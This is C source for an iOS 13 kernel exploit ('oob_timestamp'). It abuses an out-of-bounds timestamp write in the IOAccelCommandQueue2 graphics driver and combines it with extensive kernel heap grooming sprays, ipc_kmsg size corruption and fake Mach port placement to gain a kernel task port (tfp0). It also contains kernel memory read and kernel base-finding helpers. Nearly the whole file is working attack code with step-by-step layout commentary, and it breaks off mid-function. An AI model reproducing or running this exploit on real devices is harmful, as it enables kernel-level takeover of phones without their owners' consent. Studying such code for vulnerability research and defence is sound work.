/*
 * oob_timestamp.c
 * Brandon Azad
 */
#include "oob_timestamp.h"

#include <assert.h>
#include <inttypes.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <CommonCrypto/CommonCrypto.h>
#include <CoreFoundation/CoreFoundation.h>
#include <mach-o/loader.h>
#include <mach/mach.h>
#include <mach/mach_time.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/sysctl.h>

#include "IOKitLib.h"
#include "iosurface.h"
#include "ipc_port.h"
#include "kernel_alloc.h"
#include "kernel_memory.h"
#include "log.h"
#include "mach_vm.h"
#include "parameters.h"
#include "platform.h"
#include "jelbrekLib.h"

// ---- Exploit tuning ----------------------------------------------------------------------------

// Define this to 1 to enable device memory layout profiling.
#define PROFILE_COMMAND_BUFFER_ADDRESS 0

#ifndef SEG_TEXT_EXEC
# define SEG_TEXT_EXEC "__TEXT_EXEC"
#endif

#ifndef SECT_CSTRING
# define SECT_CSTRING "__cstring"
#endif

#ifndef MIN
# define MIN(a, b) ((a) < (b) ? (a) : (b))
#endif

#define ARM_PGSHIFT_4K (12U)
#define ARM_PGSHIFT_16K (14U)
#define KADDR_FMT "0x%" PRIx64
#define VM_KERN_MEMORY_CPU (9)
#define RD(a) extract32(a, 0, 5)
#define RN(a) extract32(a, 5, 5)
#define SHA384_DIGEST_LENGTH (48)
#define IS_RET(a) ((a) == 0xD65F03C0U)
#define ADRP_ADDR(a) ((a) & ~0xFFFULL)
#define ARM_PGMASK (ARM_PGBYTES - 1ULL)
#define ADRP_IMM(a) (ADR_IMM(a) << 12U)
#define ARM_PGBYTES (1U << arm_pgshift)
//#define IO_OBJECT_NULL ((io_object_t)0)
#define ADD_X_IMM(a) extract32(a, 10, 12)
#define LDR_X_IMM(a) (sextract64(a, 5, 19) << 2U)
#define IS_ADR(a) (((a) & 0x9F000000U) == 0x10000000U)
#define IS_ADRP(a) (((a) & 0x9F000000U) == 0x90000000U)
#define IS_ADD_X(a) (((a) & 0xFFC00000U) == 0x91000000U)
#define IS_LDR_X(a) (((a) & 0xFF000000U) == 0x58000000U)
#define LDR_X_UNSIGNED_IMM(a) (extract32(a, 10, 12) << 3U)
#define kBootNoncePropertyKey "com.apple.System.boot-nonce"
#define kIONVRAMDeletePropertyKey "IONVRAM-DELETE-PROPERTY"
#define IS_LDR_X_UNSIGNED_IMM(a) (((a) & 0xFFC00000U) == 0xF9400000U)
#define ADR_IMM(a) ((sextract64(a, 5, 19) << 2U) | extract32(a, 29, 2))
#define kIONVRAMForceSyncNowPropertyKey "IONVRAM-FORCESYNCNOW-PROPERTY"

#define PROC_TASK_OFF (0x10)
#define OS_STRING_STRING_OFF (0x10)
#define OS_DICTIONARY_COUNT_OFF (0x14)
#define IPC_PORT_IP_KOBJECT_OFF (0x68)
#define IO_DT_NVRAM_OF_DICT_OFF (0xC0)
#define OS_DICTIONARY_DICT_ENTRY_OFF (0x20)
#define CPU_DATA_CPU_EXC_VECTORS_OFF (0xE0)
#define VM_KERNEL_LINK_ADDRESS (0xFFFFFFF007004000ULL)
#define APPLE_MOBILE_AP_NONCE_GENERATE_NONCE_SEL (0xC8)
#define kCFCoreFoundationVersionNumber_iOS_13_0_b2 (1656)
#define kCFCoreFoundationVersionNumber_iOS_13_0_b1 (1652.20)
#define APPLE_MOBILE_AP_NONCE_BOOT_NONCE_OS_SYMBOL_OFF (0xC0)
#define PROC_P_PID_OFF (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_13_0_b2 ? 0x68 : 0x60)
#define TASK_ITK_REGISTERED_OFF (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_13_0_b1 ? 0x308 : 0x2E8)


// Set this value to 48 MB below the average of the minimum and maximum fault addresses observed
// in the panic logs generated when profiling.
uint64_t ADDRESS(fake_port_page) = 0xffffffe13a708000;

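// A hedged sketch of how to derive this value from profiling runs: with
// PROFILE_COMMAND_BUFFER_ADDRESS set to 1, the exploit performs a full 8-byte out-of-bounds
// timestamp write, which panics at an address just past the command buffer. Collect the fault
// addresses from several panic logs and aim 48 MB below their midpoint. The values below are
// placeholders, not measurements:
//
//     uint64_t min_fault = 0xffffffe13c000000;    // hypothetical lowest observed fault
//     uint64_t max_fault = 0xffffffe140000000;    // hypothetical highest observed fault
//     uint64_t fake_port_page = (min_fault + max_fault) / 2 - 48 * MB;
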
// ---- IOGraphicsAccelerator2 --------------------------------------------------------------------

const int IOAccelCommandQueue2_type = 4;
const int IOAccelSharedUserClient2_type = 2;
const int IOAccelSharedUserClient2_create_shmem_selector = 5;
const int IOAccelCommandQueue2_set_notification_port_selector = 0;
const int IOAccelCommandQueue2_submit_command_buffers_selector = 1;

struct IOAccelDeviceShmemData {
    void *data;
    uint32_t length;
    uint32_t shmem_id;
};

struct IOAccelCommandQueueSubmitArgs_Header {
    uint32_t field_0;
    uint32_t count;
};

struct IOAccelCommandQueueSubmitArgs_Command {
    uint32_t command_buffer_shmem_id;
    uint32_t segment_list_shmem_id;
    uint64_t notify_1;
    uint64_t notify_2;
};

struct IOAccelSegmentListHeader {
    uint32_t field_0;
    uint32_t field_4;
    uint32_t segment_count;
    uint32_t length;
};

struct IOAccelSegmentResourceList_ResourceGroup {
    uint32_t resource_id[6];
    uint8_t field_18[48];
    uint16_t resource_flags[6];
    uint8_t field_54[2];
    uint16_t resource_count;
};

struct IOAccelSegmentResourceListHeader {
    uint64_t field_0;
    uint32_t kernel_commands_start_offset;
    uint32_t kernel_commands_end_offset;
    int total_resources;
    uint32_t resource_group_count;
    struct IOAccelSegmentResourceList_ResourceGroup resource_groups[];
};

struct IOAccelKernelCommand {
    uint32_t type;
    uint32_t size;
};

struct IOAccelKernelCommand_CollectTimeStamp {
    struct IOAccelKernelCommand command;
    uint64_t timestamp;
};

/*
 * IOAccelSharedUserClient2_create_shmem
 *
 * Description:
 *     Call IOAccelSharedUserClient2::create_shmem() to create a shared memory region. The maximum
 *     shared region size on iOS is 96 MB.
 */
static void
IOAccelSharedUserClient2_create_shmem(io_connect_t IOAccelSharedUserClient2, size_t size,
        struct IOAccelDeviceShmemData *shmem) {
    assert(shmem != NULL);
    size_t out_size = sizeof(*shmem);
    uint64_t shmem_size = size;
    kern_return_t kr = IOConnectCallMethod(IOAccelSharedUserClient2,
            IOAccelSharedUserClient2_create_shmem_selector,
            &shmem_size, 1,
            NULL, 0,
            NULL, NULL,
            shmem, &out_size);
    assert(kr == KERN_SUCCESS);
}

typedef uint64_t kaddr_t;
typedef mach_port_t io_object_t;
typedef io_object_t io_service_t;
typedef io_object_t io_connect_t;
typedef io_object_t io_registry_entry_t;

typedef struct {
    kaddr_t sec_text_start;
    uint64_t sec_text_sz;
    void *sec_text;
    kaddr_t sec_cstring_start;
    uint64_t sec_cstring_sz;
    void *sec_cstring;
} pfinder_t;

typedef struct {
    kaddr_t key;
    kaddr_t value;
} dict_entry_t;

kern_return_t
mach_vm_write(vm_map_t, mach_vm_address_t, vm_offset_t, mach_msg_type_number_t);

kern_return_t
mach_vm_read_overwrite(vm_map_t, mach_vm_address_t, mach_vm_size_t, mach_vm_address_t, mach_vm_size_t *);

kern_return_t
mach_vm_machine_attribute(vm_map_t, mach_vm_address_t, mach_vm_size_t, vm_machine_attribute_t, vm_machine_attribute_val_t *);

kern_return_t
mach_vm_region(vm_map_t, mach_vm_address_t *, mach_vm_size_t *, vm_region_flavor_t, vm_region_info_t, mach_msg_type_number_t *, mach_port_t *);

kern_return_t
IOObjectRelease(io_object_t);

CFMutableDictionaryRef
IOServiceMatching(const char *);

io_service_t
IOServiceGetMatchingService(mach_port_t, CFDictionaryRef);

kern_return_t
IOServiceOpen(io_service_t, task_port_t, uint32_t, io_connect_t *);

kern_return_t
IORegistryEntrySetCFProperty(io_registry_entry_t, CFStringRef, CFTypeRef);

kern_return_t
IOConnectCallStructMethod(io_connect_t, uint32_t, const void *, size_t, void *, size_t *);

kern_return_t
IOServiceClose(io_connect_t);

static unsigned arm_pgshift;

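/*
 * kread_buf
 *
 * Description:
 *     Read sz bytes of kernel memory at addr into buf via the given kernel task port. Reads
 *     are split at kernel page boundaries so that no single mach_vm_read_overwrite() call
 *     crosses a page.
 */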
static kern_return_t
kread_buf(kaddr_t addr, void *buf, mach_vm_size_t sz, mach_port_t tfp0) {
    mach_vm_address_t p = (mach_vm_address_t)buf;
    mach_vm_size_t read_sz, out_sz = 0;

    while(sz) {
        read_sz = MIN(sz, ARM_PGBYTES - (addr & ARM_PGMASK));
        if(mach_vm_read_overwrite(tfp0, addr, read_sz, p, &out_sz) != KERN_SUCCESS || out_sz != read_sz) {
            return KERN_FAILURE;
        }
        p += read_sz;
        sz -= read_sz;
        addr += read_sz;
    }
    return KERN_SUCCESS;
}


static kern_return_t
kread_addr(kaddr_t addr, kaddr_t *value, mach_port_t tfp0) {
    return kread_buf(addr, value, sizeof(*value), tfp0);
}

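/*
 * get_kbase
 *
 * Description:
 *     Find the kernel base and slide using the kernel task port. First try
 *     task_info(TASK_DYLD_INFO), which some tfp0 patches use to report the kernel slide in
 *     all_image_info_size. Otherwise, scan for the VM_KERN_MEMORY_CPU region, read the
 *     cpu_exc_vectors pointer out of the cpu data, and walk backwards one page at a time
 *     until the kernel Mach-O header (MH_MAGIC_64) is found. Returns 0 on failure.
 */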
static kaddr_t
get_kbase(kaddr_t *kslide, mach_port_t tfp0) {
    mach_msg_type_number_t cnt = TASK_DYLD_INFO_COUNT;
    vm_region_extended_info_data_t extended_info;
    task_dyld_info_data_t dyld_info;
    kaddr_t addr, cpu_exc_vectors;
    mach_port_t obj_nm;
    mach_vm_size_t sz;
    uint32_t magic;

    // arm_pgshift is never assigned elsewhere in this file, which would make ARM_PGBYTES
    // equal to 1. Default it from the exported vm_kernel_page_shift global (assumption: the
    // kernel page size matches what the kernel exports to userspace).
    if(arm_pgshift == 0) {
        arm_pgshift = (unsigned)vm_kernel_page_shift;
    }
    if(task_info(tfp0, TASK_DYLD_INFO, (task_info_t)&dyld_info, &cnt) == KERN_SUCCESS && dyld_info.all_image_info_size) {
        *kslide = dyld_info.all_image_info_size;
        return VM_KERNEL_LINK_ADDRESS + *kslide;
    }
    addr = 0;
    cnt = VM_REGION_EXTENDED_INFO_COUNT;
    while(mach_vm_region(tfp0, &addr, &sz, VM_REGION_EXTENDED_INFO, (vm_region_info_t)&extended_info, &cnt, &obj_nm) == KERN_SUCCESS) {
        mach_port_deallocate(mach_task_self(), obj_nm);
        if(extended_info.user_tag == VM_KERN_MEMORY_CPU && extended_info.protection == VM_PROT_DEFAULT) {
            if(kread_addr(addr + CPU_DATA_CPU_EXC_VECTORS_OFF, &cpu_exc_vectors, tfp0) != KERN_SUCCESS || (cpu_exc_vectors & ARM_PGMASK)) {
                break;
            }
            INFO("cpu_exc_vectors: " KADDR_FMT "\n", cpu_exc_vectors);
            do {
                cpu_exc_vectors -= ARM_PGBYTES;
                if(cpu_exc_vectors <= VM_KERNEL_LINK_ADDRESS || kread_buf(cpu_exc_vectors, &magic, sizeof(magic), tfp0) != KERN_SUCCESS) {
                    return 0;
                }
            } while(magic != MH_MAGIC_64);
            *kslide = cpu_exc_vectors - VM_KERNEL_LINK_ADDRESS;
            return cpu_exc_vectors;
        }
        addr += sz;
    }
    return 0;
}

/*
 * IOAccelCommandQueue2_set_notification_port
 *
 * Description:
 *     Call IOAccelCommandQueue2::set_notification_port() to set a notification port. This is
 *     required before IOAccelCommandQueue2::submit_command_buffers() can be called.
 */
static void
IOAccelCommandQueue2_set_notification_port(io_connect_t IOAccelCommandQueue2,
        mach_port_t notification_port) {
    kern_return_t kr = IOConnectCallAsyncMethod(IOAccelCommandQueue2,
            IOAccelCommandQueue2_set_notification_port_selector,
            notification_port,
            NULL, 0,
            NULL, 0,
            NULL, 0,
            NULL, NULL,
            NULL, NULL);
    assert(kr == KERN_SUCCESS);
}

/*
 * IOAccelCommandQueue2_submit_command_buffers
 *
 * Description:
 *     Call IOAccelCommandQueue2::submit_command_buffers(). The submit_args should describe the
 *     command buffer and segment list for each command.
 */
static void
IOAccelCommandQueue2_submit_command_buffers(io_connect_t IOAccelCommandQueue2,
        const struct IOAccelCommandQueueSubmitArgs_Header *submit_args,
        size_t size) {
    kern_return_t kr = IOConnectCallMethod(IOAccelCommandQueue2,
            IOAccelCommandQueue2_submit_command_buffers_selector,
            NULL, 0,
            submit_args, size,
            NULL, NULL,
            NULL, NULL);
    assert(kr == KERN_SUCCESS);
}

// ---- Exploit functions -------------------------------------------------------------------------

#define KB (1024uLL)
#define MB (1024uLL * KB)
#define GB (1024uLL * MB)

/*
 * for_each_page
 *
 * Description:
 *     Iterate through pages in a data region. It is assumed that the address passed is the start
 *     of the first page. The callback is invoked with the address of each page and its index.
 */
static void
for_each_page(void *data, size_t size, void (^callback)(void *page, size_t index, bool *stop)) {
    size_t count = size / page_size;
    bool stop = false;
    for (size_t i = 0; i < count && !stop; i++) {
        callback(data, i, &stop);
        data = (uint8_t *) data + page_size;
    }
}
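
/*
 * Example usage (a sketch mirroring how for_each_page() is invoked in steps 24 and 27 below):
 *
 *     for_each_page(command_buffer, command_buffer_size,
 *             ^(void *page, size_t index, bool *stop) {
 *         // Inspect or initialize this page; set *stop = true to end the walk early.
 *     });
 */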

/*
 * fail
 *
 * Description:
 *     Abort the exploit.
 */
static void _Noreturn
fail(void) {
    usleep(100000);
    exit(1);
}

// ---- Exploit -----------------------------------------------------------------------------------

void
oob_timestamp() {
    // Test if we already have a kernel task port. A previous run of the exploit stashes tfp0
    // in host special port 4 (see the end of this function).
    mach_port_t host = mach_host_self();
    host_get_special_port(host, 0, 4, &kernel_task_port);
    if (MACH_PORT_VALID(kernel_task_port)) {
        INFO("tfp0: 0x%x", kernel_task_port);
        struct task_dyld_info info;
        mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;
        task_info(kernel_task_port, TASK_DYLD_INFO, (task_info_t) &info, &count);
        INFO("kernel base: 0x%016llx", info.all_image_info_addr);
        return;
    }

    // Check that this platform is supported.
    INFO("Platform: %s %s", platform.machine, platform.osversion);
    bool ok = parameters_init();
    if (!ok) {
        fail();
    }

    INFO("[%llx] oob_timestamp", mach_absolute_time());

    // 1. Open the IOAccelCommandQueue2 and IOAccelSharedUserClient2 user clients.
    io_service_t IOGraphicsAccelerator2 = IOServiceGetMatchingService(kIOMasterPortDefault,
            IOServiceMatching("IOGraphicsAccelerator2"));
    assert(IOGraphicsAccelerator2 != IO_OBJECT_NULL);
    io_connect_t IOAccelCommandQueue2 = IO_OBJECT_NULL;
    IOServiceOpen(IOGraphicsAccelerator2, mach_task_self(),
            IOAccelCommandQueue2_type, &IOAccelCommandQueue2);
    assert(IOAccelCommandQueue2 != IO_OBJECT_NULL);
    io_connect_t IOAccelSharedUserClient2 = IO_OBJECT_NULL;
    IOServiceOpen(IOGraphicsAccelerator2, mach_task_self(),
            IOAccelSharedUserClient2_type, &IOAccelSharedUserClient2);
    assert(IOAccelSharedUserClient2 != IO_OBJECT_NULL);

    // 2. Initialize IOSurface.
    ok = IOSurface_init();
    assert(ok);
    uint32_t iosurface_property = 0;

    // 3. Connect the IOAccelCommandQueue2 to IOAccelSharedUserClient2.
    kern_return_t kr = IOConnectAddClient(IOAccelCommandQueue2, IOAccelSharedUserClient2);
    assert(kr == KERN_SUCCESS);

    // 4. Allocate 200 holding ports. Only about 29 will be used.
    struct holding_port_array holding_ports = holding_ports_create(200);
    struct holding_port_array all_holding_ports = holding_ports;

    // 5. Create the command buffer and segment list. Each is of size 96 MB, which is the
    // maximum size of an IOKit pageable map allowed by XNU's IOIteratePageableMaps(). The
    // shared memory regions will only be mapped into the kernel on the first call to
    // IOAccelCommandQueue2::submit_command_buffers().
    const uint32_t command_buffer_size = 96 * MB;
    const uint32_t segment_list_size = 96 * MB;
    // Create the command buffer.
    struct IOAccelDeviceShmemData command_buffer_shmem;
    IOAccelSharedUserClient2_create_shmem(IOAccelSharedUserClient2,
            command_buffer_size, &command_buffer_shmem);
    void *command_buffer = command_buffer_shmem.data;
    // Create the segment list.
    struct IOAccelDeviceShmemData segment_list_shmem;
    IOAccelSharedUserClient2_create_shmem(IOAccelSharedUserClient2,
            segment_list_size, &segment_list_shmem);
    void *segment_list = segment_list_shmem.data;
    // Wire down the command buffer and segment list. Note that this does not ensure that
    // accessing these pages from the kernel won't fault (see step 24).
    mlock(command_buffer, command_buffer_size);
    mlock(segment_list, segment_list_size);

    // 6. Register a notification port for the IOAccelCommandQueue2. No need to listen on it
    // (keep that infoleak well hidden!).
    mach_port_t notification_port = holding_port_grab(&holding_ports);
    IOAccelCommandQueue2_set_notification_port(IOAccelCommandQueue2, notification_port);

    // 7. Set up the arguments to IOAccelCommandQueue2::submit_command_buffers().
    struct {
        struct IOAccelCommandQueueSubmitArgs_Header header;
        struct IOAccelCommandQueueSubmitArgs_Command command;
    } submit_args = {};
    submit_args.header.count = 1;
    submit_args.command.command_buffer_shmem_id = command_buffer_shmem.shmem_id;
    submit_args.command.segment_list_shmem_id = segment_list_shmem.shmem_id;
    // Segment list header.
    struct IOAccelSegmentListHeader *slh = (void *) segment_list;
    slh->length = 0x100;
    slh->segment_count = 1;
    struct IOAccelSegmentResourceListHeader *srlh = (void *)(slh + 1);
    srlh->kernel_commands_start_offset = 0;
    srlh->kernel_commands_end_offset = command_buffer_size;
    // CollectTimeStamp command 1 is located at the beginning of the command buffer and skips
    // to the end of the buffer. After calling IOAccelCommandQueue2::submit_command_buffers(),
    // the first of the two timestamps is written to ts_cmd_1->timestamp.
    struct IOAccelKernelCommand_CollectTimeStamp *ts_cmd_1 = (void *)command_buffer_shmem.data;

    // 8. This function will set up the out-of-bounds timestamp write to write the specified
    // number of bytes past the end of the command buffer.
    void (^init_out_of_bounds_timestamp_write_size)(size_t) = ^(size_t overflow_size) {
        assert(0 <= overflow_size && overflow_size <= 8);
        // Make the first CollectTimeStamp command skip to the end of the buffer, leaving
        // enough space for a full timestamp command minus the amount we want to overflow.
        size_t ts_cmd_1_size = command_buffer_size - (sizeof(*ts_cmd_1) - overflow_size);
        ts_cmd_1->command.type = 2;
        ts_cmd_1->command.size = (uint32_t) ts_cmd_1_size;
        // CollectTimeStamp command 2 writes the timestamp past the end of the buffer. The
        // function IOAccelCommandQueue2::processSegmentKernelCommand() excludes the length
        // of the 8-byte header when verifying that the entire command is within the bounds
        // of the command buffer, so the command passes validation even though the timestamp
        // part of it is out-of-bounds.
        void *next = ((uint8_t *) ts_cmd_1 + ts_cmd_1->command.size);
        struct IOAccelKernelCommand_CollectTimeStamp *ts_cmd_2 = next;
        ts_cmd_2->command.type = 2;
        ts_cmd_2->command.size = sizeof(*ts_cmd_1) - 8;
    };
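
    // For reference, a hedged sketch of the flawed kernel-side check described above. This is
    // reconstructed from the comment, not taken from the actual IOAccelCommandQueue2 source;
    // names and structure are illustrative only:
    //
    //     // Intended: verify that the whole 16-byte CollectTimeStamp command lies within
    //     // the command buffer. Actual: the 8-byte IOAccelKernelCommand header is excluded
    //     // first, so only the header itself is bounds-checked:
    //     if ((uint8_t *) ts_cmd + sizeof(*ts_cmd) - sizeof(struct IOAccelKernelCommand) > end)
    //         return kIOReturnError;
    //     ts_cmd->timestamp = mach_absolute_time();    // can land up to 8 bytes past `end`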

    // TODO: Separate kmem_alloc() spray with larger element size for padding out the kfree()
    // region.

    // 9. Prepare the IOSurface kmem_alloc() spray for padding out the kfree() region and for
    // reallocating the out-of-line ports. We can use the rest of the segment list buffer as
    // scratch space for this.
    //
    // TODO: For now, we'll use a static address for our fake port. This value works on my
    // factory-reset iPhone12,3 64GB on iOS 13.3 17C54 when run about 30 seconds after boot
    // with no other apps launched. It will vary widely depending on your exact device and what
    // processes are running. To get a sense of what value to use, you can define
    // PROFILE_COMMAND_BUFFER_ADDRESS above.
    uint64_t fake_port_offset = 0x100;
    uint64_t fake_port_address = ADDRESS(fake_port_page) + fake_port_offset;
    void *ool_ports_reallocation_array_buffer = (uint8_t *) segment_list + page_size;
    size_t ool_ports_reallocation_array_buffer_size = segment_list_size - page_size;
    ok = IOSurface_kmem_alloc_array_fast_prepare_(
            16 * page_size,                             // Each kmem_alloc() is 16 pages
            80 * MB,                                    // Spray 80 MB
            ool_ports_reallocation_array_buffer,        // The buffer to use
            &ool_ports_reallocation_array_buffer_size,  // The size of the buffer
            ^(void *data, size_t index) {               // Initialization callback
        // Place a fake Mach port pointer as the first item in the fake OOL ports array.
        *(uint64_t *)((uint8_t *) data + 8 * page_size) = fake_port_address;
    });
    if (!ok) {
        ERROR("Failed to prepare OOL ports reallocation spray");
        fail();
    }
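
    // Design note (inferred from the function names, not from any documented API): the spray
    // is split into a prepare phase and a commit phase. The expensive serialization of the
    // ~80 MB spray into the scratch buffer happens here, up front, so that the later calls to
    // IOSurface_kmem_alloc_array_fast() in steps 18 and 22 only hand the pre-built blob to
    // the kernel, keeping the reallocation window short.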

    // 10. Allocate 120 MB of 7-page kalloc allocations for a kalloc fragmentation. Put at most
    // 10 MB in each port. We want to fill the kalloc_map and start allocating from the
    // kernel_map near the middle of this spray.
    //
    // --#==============#=================+===+===+===+===#---+---+---+---+---+---+---+--------
    //   |  zalloc map  |   kalloc map    | 7 | 7 | 7 | 7 # 7 | 7 | 7 | 7 | 7 | 7 | 7 |
    // --#==============#=================+===+===+===+===#---+---+---+---+---+---+---+--------
    struct ipc_kmsg_kalloc_fragmentation_spray fragmentation_spray;
    ipc_kmsg_kalloc_fragmentation_spray_(&fragmentation_spray,
            7 * page_size,    // 7-page kalloc allocations
            120 * MB,         // 120 MB total spray
            10 * MB,          // 10 MB per port
            &holding_ports);

    // 11. Free 30 MB of the fragmentation spray from each end. This should create enough free
    // space in both the kalloc_map and the kernel_map to satisfy most allocations smaller than
    // 8 pages.
    //
    // --#==============#=================+===+===+===+===#---+---+---+---+---+---+---+--------
    //   |  zalloc map  |   kalloc map    | 7 |   | 7 |   # 7 | 7 | 7 |   | 7 |   | 7 |
    // --#==============#=================+===+===+===+===#---+---+---+---+---+---+---+--------
    ipc_kmsg_kalloc_fragmentation_spray_fragment_memory_(&fragmentation_spray, 30 * MB, +1);
    ipc_kmsg_kalloc_fragmentation_spray_fragment_memory_(&fragmentation_spray, 30 * MB, -1);

    // 12. Allocate 200 MB of 8-page kalloc allocations. This should be enough to fill any
    // remaining 8-page holes in the kalloc_map and kernel_map and start allocating from fresh
    // VA space in the kernel_map.
    //
    // -+---+---+---+---+----+-----------+----+----+----+----+---------+-----------------------
    //  |   | 7 |   | 7 |  8 | old alloc |  8 |  8 |  8 |  8 |  8 |  8 | fresh VA space ->
    // -+---+---+---+---+----+-----------+----+----+----+----+---------+-----------------------
    struct ipc_kmsg_kalloc_spray kalloc_8page_spray;
    ipc_kmsg_kalloc_spray_(&kalloc_8page_spray,
            NULL,             // Zero-fill the message data.
            8 * page_size,    // 8-page kalloc allocations.
            200 * MB,         // 200 MB total spray.
            0,                // Max spray size per port.
            &holding_ports);

    // 13. Create an 82 MB kalloc allocation in the kernel_map. This serves two purposes:
    // First, when we later spray kmem_alloc allocations to pad the over-freed region and then
    // again to reallocate the freed OOL ports array, we'll need a hole in which the kernel can
    // map in the 80 MB data blob needed to produce that spray. Second, in order to avoid
    // triggering a "kfree: size %u > kalloc_largest_allocated" panic when freeing the
    // corrupted ipc_kmsg, we also need to actually perform a kalloc allocation larger than the
    // maximum possible kfree() size that could result from destroying the corrupted ipc_kmsg.
    //
    // ----------------------------+-----------------+-----------------------------------------
    //  <- all 8 page holes filled |   huge kalloc   | fresh VA space ->
    // ----------------------------+-----------------+-----------------------------------------
    //                                   82 MB
    uint32_t huge_kalloc_key = IOSurface_property_key(iosurface_property++);
    ok = IOSurface_kalloc_fast(huge_kalloc_key, 82 * MB);
    if (!ok) {
        ERROR("Could not allocate huge kalloc IOSurface buffer");
        fail();
    }

    // 14. Allocate the IOKit pageable memory regions via XNU's IOIteratePageableMaps(). The
    // maximum size of an IOKit pageable map is 96 MB, so creating a command buffer and segment
    // list each of size 96 MB will ensure that they are each allocated to their own pageable
    // map. This both maximizes the space available for shared memory address prediction and
    // ensures that the out-of-bounds write off the end of the command buffer will fall into
    // the next adjacent memory region.
    //
    // ---------------+-----------------+------------------+------------------+----------------
    //  <- 8PG filled |   huge kalloc   |   segment list   |  command buffer  |
    // ---------------+-----------------+------------------+------------------+----------------
    //                      82 MB              96 MB              96 MB
    init_out_of_bounds_timestamp_write_size(0);
#if PROFILE_COMMAND_BUFFER_ADDRESS
    init_out_of_bounds_timestamp_write_size(8);
#endif
    IOAccelCommandQueue2_submit_command_buffers(IOAccelCommandQueue2,
            &submit_args.header, sizeof(submit_args));

    // 15. Allocate a single 8-page ipc_kmsg and store it in a holding port. This ipc_kmsg
    // should fall directly after the command buffer pageable map.
    //
    // ------------------+------------------+-----------+--------------------------------------
    //    segment list   |  command buffer  | ipc_kmsg  |
    // ------------------+------------------+-----------+--------------------------------------
    //        82 MB             96 MB           8 PG
    mach_port_t corrupted_kmsg_port = holding_port_pop(&holding_ports);
    ipc_kmsg_kalloc_send_one(corrupted_kmsg_port, 8 * page_size);

    // 16. Allocate a single 8-page array of out-of-line port descriptors.
    //
    // Ideally we'd allocate more than one array of out-of-line ports. However, these arrays
    // are allocated with kalloc() which sets the KMA_ATOMIC flag, meaning they cannot be only
    // partially freed. Each additional array of out-of-line ports would bump up the minimum
    // free size, which means we'd need to allocate even more kfree() buffer memory.
    //
    // ------------------+------------------+-----------+-----------+--------------------------
    //    segment list   |  command buffer  | ipc_kmsg  | ool ports |
    // ------------------+------------------+-----------+-----------+--------------------------
    //        82 MB             96 MB           8 PG        8 PG
    size_t ool_port_count = (7 * page_size) / sizeof(uint64_t) + 1;
    mach_port_t ool_ports_msg_holding_port = holding_port_pop(&holding_ports);
    ok = ool_ports_send_one(ool_ports_msg_holding_port,
            NULL,                          // Use MACH_PORT_NULL for every port
            ool_port_count,                // Enough ports to just spill onto 8 pages
            MACH_MSG_TYPE_MOVE_RECEIVE,    // Get a receive right
            256);                          // Send a message of size 256.
    if (!ok) {
        ERROR("Failed to send out-of-line Mach ports");
        fail();
    }

    // 17. Free the kalloc placeholder. This creates a hole into which the XML data blob for
    // the following spray can be mapped. There is also about 2 MB of slack (for no particular
    // reason).
    //
    // --------+-----------------+-----------+-----------+------+------+-----------------------
    //  <- 8PG |                 |  seglist  |  cmdbuf   | kmsg | ool  |
    // -filled-+-----------------+-----------+-----------+------+------+-----------------------
    //               82 MB           96 MB       96 MB     8 PG   8 PG
    IOSurface_remove_property(huge_kalloc_key);

    // 18. In order to avoid triggering a "vm_map_delete(...): hole after %p" panic, we need to
    // ensure that the next 80 MB (0x05000000 bytes) after the OOL ports array are allocated.
    // Furthermore, this memory cannot be allocated with kalloc(), since kalloc() sets the
    // KMA_ATOMIC flag (which means that the allocation cannot be partially freed, as will
    // probably happen when we destroy the corrupted ipc_kmsg). Thus, we will spray
    // kmem_alloc() allocations using IOSurface.
    //
    // (Ideally we'd directly allocate an 80 MB kmem_alloc() buffer to avoid the step below,
    // but this is larger than the maximum size possible using the OSUnserializeBinary() API.)
    //
    // What we spray isn't important; all we need to do is ensure that all additional
    // memory that might be kfree()d is allocated with kmem_alloc() allocations.
    //
    // --------+-----------------+-----------+-----------+------+------+--+--+--+--+--+--------
    //  <- 8PG | [80 MB XML map] |  seglist  |  cmdbuf   | kmsg | ool  | kfree buffer |
    // -filled-+-----------------+-----------+-----------+------+------+--+--+--+--+--+--------
    //               82 MB           96 MB       96 MB     8 PG   8 PG      80 MB
    uint32_t kfree_buffer_key = IOSurface_property_key(iosurface_property++);
    ok = IOSurface_kmem_alloc_array_fast(kfree_buffer_key,
            ool_ports_reallocation_array_buffer,        // The pre-initialized buffer
            ool_ports_reallocation_array_buffer_size);  // The size
    if (!ok) {
        ERROR("Could not allocate kfree region buffer");
        fail();
    }

    // 19. We will use the out-of-bounds timestamp write to overwrite the ipc_kmsg's ikm_size
    // field with a value in the range [0x0003ffa9, 0x0400a8ff]. In order to control the value
    // written, we need to do some math.
    //
    // We assume that the timestamp will change by at most 0x10000 between when we call
    // mach_absolute_time() in userspace and when the timestamp is written over ikm_size. This
    // bound is highly conservative: in practice it rarely changes more than 0x1000, and is
    // often closer to 0x300. Furthermore, it's easy to test whether this assumption was
    // violated and redo the out-of-bounds write if necessary, so the exact tolerance value is
    // not critical.
    //
    // ikm_size is 4 bytes and immediately followed by 4 bytes of padding, so we can safely
    // overflow past ikm_size without worrying about corrupting anything.
    size_t (^compute_overflow_size_for_timestamp)(uint64_t) = ^size_t(uint64_t ts) {
        // [___+____] [___+____]    [0003ffa9, 0400a8ff]
        if (0x000000000003ffa8 < ts && ts <= 0x0000000003ffa8ff) {
            return 8;
        }
        // [_____+__] [_____+__]    [0003ffa9, 03ffa9ff]
        if (0x0000000003ffa8ff < ts && ts <= 0x00000003ffa8ffff) {
            return 7;
        }
        // [_______+] [_______+]    [0003ffa9, 03ffa900]
        if (0x00000003ffa8ffff < ts && ts <= 0x000003ffa8ffffff) {
            return 6;
        }
        // [________]+ [________]+    [0003ffa9, 03ffa900]
        if (0x000003ffa8ffffff < ts && ts <= 0x0003ffa8ffffffff) {
            return 5;
        }
        // [________] + [________] +    [0003ffa9, 03ffa900]
        if (0x0003ffa8ffffffff < ts && ts <= 0x03ffa8ffffffffff) {
            return 4;
        }
        // [00______] + [00______] +    [0003ffa9, 00ffffff]
        if (0x03ffa8ffffffffff < ts && ts <= 0xfffffffffffeffff) {
            return 3;
        }
        // If the timestamp is too small, then there is no value we can use to increase the
        // value of ikm_size. If the timestamp is too large, then we risk it wrapping
        // before we can overwrite ikm_size.
        assert(ts <= 0x000000000003ffa8 || ts > 0xfffffffffffeffff);
